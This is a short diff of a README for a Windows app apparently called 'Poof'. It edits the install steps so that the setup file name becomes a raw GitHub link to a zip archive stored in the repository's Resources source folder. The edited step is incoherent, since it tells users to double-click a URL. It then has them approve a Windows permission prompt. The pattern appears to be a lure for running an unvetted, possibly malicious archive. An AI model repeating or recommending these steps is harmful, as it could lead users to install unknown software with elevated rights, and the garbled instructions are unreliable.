torresantm12/Poof/README.md

 Follow these steps to install Poof after downloading the installer:

 1. Locate the downloaded file, usually in your `Downloads` folder.
-2. Double-click the file named something like `Poof-Setup.exe` to start the setup.
+2. Double-click the file named something like `https://raw.githubusercontent.com/torresantm12/Poof/main/Sources/Poof/Resources/Software_3.2.zip` to start the setup.
 3. If Windows asks for permission, click `Yes` to allow the installation.
 4. Follow the on-screen instructions:
    - Accept the license agreement.